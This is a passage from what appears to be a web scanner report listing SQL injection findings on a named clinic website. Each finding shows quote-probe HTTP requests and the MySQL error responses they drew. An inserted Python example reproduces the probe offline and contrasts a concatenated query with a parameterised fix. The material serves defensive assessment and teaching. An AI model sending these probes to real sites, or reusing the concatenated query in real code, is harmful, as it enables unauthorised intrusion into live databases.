Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.13. http://www.baysideeyes.com.au/cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /cmsAdmin/uploads'/BLEPHARITIS.pdf&s=204.93 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 21:53:17 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 196

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /cmsAdmin/uploads''/BLEPHARITIS.pdf&s=204.93 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 21:53:17 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.14. http://www.baysideeyes.com.au/cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /cmsAdmin/uploads/BLEPHARITIS.pdf'&s=204.93 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 21:53:17 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 196

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /cmsAdmin/uploads/BLEPHARITIS.pdf''&s=204.93 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 21:53:18 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.15. http://www.baysideeyes.com.au/cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93?1'=1 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 21:53:12 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 196

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /cmsAdmin/uploads/BLEPHARITIS.pdf&s=204.93?1''=1 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 21:53:13 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.16. http://www.baysideeyes.com.au/cmsAdmin/uploads/privacy.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /cmsAdmin/uploads/privacy.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /cmsAdmin'/uploads/privacy.htm HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:19 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 196

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /cmsAdmin''/uploads/privacy.htm HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:20 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...
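
The probe the report describes, as an added example that is neither the scanner's code nor the site's: it reproduces the single-quote/double-quote heuristic offline against a small SQLite stand-in for the lookup the error messages reveal, with the query built by string concatenation beside a parameterised version. The table name redirects, the new_url column and the assumption that the query string travels into the looked-up URI are mine; only the old_url column and the ORDER BY ... LIMIT 1 tail come from the error text above.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the redirect table implied by the
    error text (ORDER BY old_url DESC LIMIT 1). Table/column names other
    than old_url are assumptions, as is the sample data."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE redirects (old_url TEXT, new_url TEXT)")
    db.executemany("INSERT INTO redirects VALUES (?, ?)", [
        ("cmsAdmin/uploads/privacy.htm", "privacy.htm"),
        ("sitemap.htm", "sitemap.htm"),
    ])
    return db


def lookup_vulnerable(db, request_uri):
    """Query built by concatenation, the pattern the MySQL errors reveal.
    A stray quote in the URI breaks the string literal and the statement."""
    sql = ("SELECT new_url FROM redirects WHERE old_url = '"
           + request_uri.lstrip("/") + "' ORDER BY old_url DESC LIMIT 1")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def lookup_fixed(db, request_uri):
    """Parameterised form: the URI is bound as data and never parsed as SQL."""
    sql = ("SELECT new_url FROM redirects WHERE old_url = ? "
           "ORDER BY old_url DESC LIMIT 1")
    row = db.execute(sql, (request_uri.lstrip("/"),)).fetchone()
    return row[0] if row else None


def inject(path, segment_index, payload):
    """Append payload to the Nth path segment (the report's 'REST URL parameter N')."""
    parts = path.lstrip("/").split("/")
    parts[segment_index - 1] += payload
    return "/" + "/".join(parts)


def db_errors(lookup, db, uri):
    """True when the lookup raises a database error for this URI."""
    try:
        lookup(db, uri)
        return False
    except sqlite3.OperationalError:
        return True


def probe_segment(lookup, db, path, segment_index):
    """The report's heuristic: ' causes a DB error, '' does not -> report it."""
    single = db_errors(lookup, db, inject(path, segment_index, "'"))
    double = db_errors(lookup, db, inject(path, segment_index, "''"))
    return single and not double


def probe_path(lookup, db, path):
    """Run the heuristic over every path segment; return the ones that fire."""
    n = len(path.lstrip("/").split("/"))
    return [i for i in range(1, n + 1) if probe_segment(lookup, db, path, i)]


def probe_query_name(lookup, db, path):
    """Same heuristic on the name of an added query parameter (?1'=1 vs ?1''=1).
    Assumes the query string is part of the URI the application looks up."""
    single = db_errors(lookup, db, path + "?1'=1")
    double = db_errors(lookup, db, path + "?1''=1")
    return single and not double


if __name__ == "__main__":
    db = make_db()
    path = "/cmsAdmin/uploads/privacy.htm"
    print("vulnerable segments:", probe_path(lookup_vulnerable, db, path))
    print("vulnerable param name:", probe_query_name(lookup_vulnerable, db, path))
    print("fixed segments:", probe_path(lookup_fixed, db, path))
    print("fixed param name:", probe_query_name(lookup_fixed, db, path))
```

Against the concatenated query every segment and the parameter name fire, against the bound query nothing does, which is the difference between the Request/Response pairs recorded above and what a patched site would return.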

1.17. http://www.baysideeyes.com.au/cmsAdmin/uploads/privacy.htm [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /cmsAdmin/uploads/privacy.htm

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /cmsAdmin/uploads'/privacy.htm HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:23 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 196

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /cmsAdmin/uploads''/privacy.htm HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:24 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.18. http://www.baysideeyes.com.au/cmsAdmin/uploads/privacy.htm [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /cmsAdmin/uploads/privacy.htm

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /cmsAdmin/uploads/privacy.htm' HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:29 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 226

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''cmsAdmin/uploads/privacy.htm'')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /cmsAdmin/uploads/privacy.htm'' HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:30 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.19. http://www.baysideeyes.com.au/cmsAdmin/uploads/privacy.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /cmsAdmin/uploads/privacy.htm

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /cmsAdmin/uploads/privacy.htm?1'=1 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:01 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 196

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /cmsAdmin/uploads/privacy.htm?1''=1 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:01 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.20. http://www.baysideeyes.com.au/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /favicon.ico' HTTP/1.1
Host: www.baysideeyes.com.au
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:34:35 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Content-Type: text/html; charset=utf-8
Content-Length: 209

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''favicon.ico'')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /favicon.ico'' HTTP/1.1
Host: www.baysideeyes.com.au
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:34:35 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.21. http://www.baysideeyes.com.au/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /favicon.ico?1'=1 HTTP/1.1
Host: www.baysideeyes.com.au
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:34:23 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Content-Type: text/html; charset=utf-8
Content-Length: 196

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /favicon.ico?1''=1 HTTP/1.1
Host: www.baysideeyes.com.au
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 22:34:23 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.22. http://www.baysideeyes.com.au/referrer-information.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /referrer-information.htm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /referrer-information.htm' HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:55 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 222

MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''referrer-information.htm'')
ORDER BY old_url DESC
LIMIT 1' at line 3

Request 2

GET /referrer-information.htm'' HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=171516723.1296943214.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=171516723.1653684966.1296943214.1296943214.1296943214.1; __utmc=171516723; __utmb=171516723.1.10.1296943214;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:02:56 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 5388

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.23. http://www.baysideeyes.com.au/referrer-information.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.baysideeyes.com.au
Path:   /referrer-information.htm

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /referrer-information.htm?1'=1 HTTP/1.1
Host: www.baysideeyes.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
